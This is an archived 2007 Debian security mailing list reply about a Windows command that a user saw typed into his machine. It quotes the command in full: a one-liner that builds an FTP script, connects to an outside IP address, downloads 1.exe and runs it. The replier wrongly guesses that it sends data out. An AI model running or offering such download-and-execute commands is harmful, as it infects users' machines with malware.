Re: spooky windows script

To: debian-security@lists.debian.org
Subject: Re: spooky windows script
From: Celejar <celejar@gmail.com>
Date: Tue, 8 May 2007 09:39:59 -0400
Message-id: <20070508093959.d9ade2d5.celejar@gmail.com>
In-reply-to: <3246512.31471178629044474.JavaMail.www@wwinf6103>
References: <3246512.31471178629044474.JavaMail.www@wwinf6103>

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <jan.outhuis@orange.nl> wrote:

> Hello,
> 
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> 
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> 
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> 
> After that all is back to normal.
> 
> Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> 
> Anybody got a clue on this?
> 
> Tia,
> 
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator

Reply to:

Follow-Ups:
- Re: spooky windows script
  - From: andersen@physics.purdue.edu
- Re: spooky windows script
  - From: Stephan Loh <loh@rommelwood.de>

References:
- spooky windows script
  - From: Jan Outhuis <jan.outhuis@orange.nl>

Prev by Date: Re: spooky windows script
Next by Date: Re: spooky windows script
Previous by thread: Re: spooky windows script
Next by thread: Re: spooky windows script
Index(es):
- Date
- Thread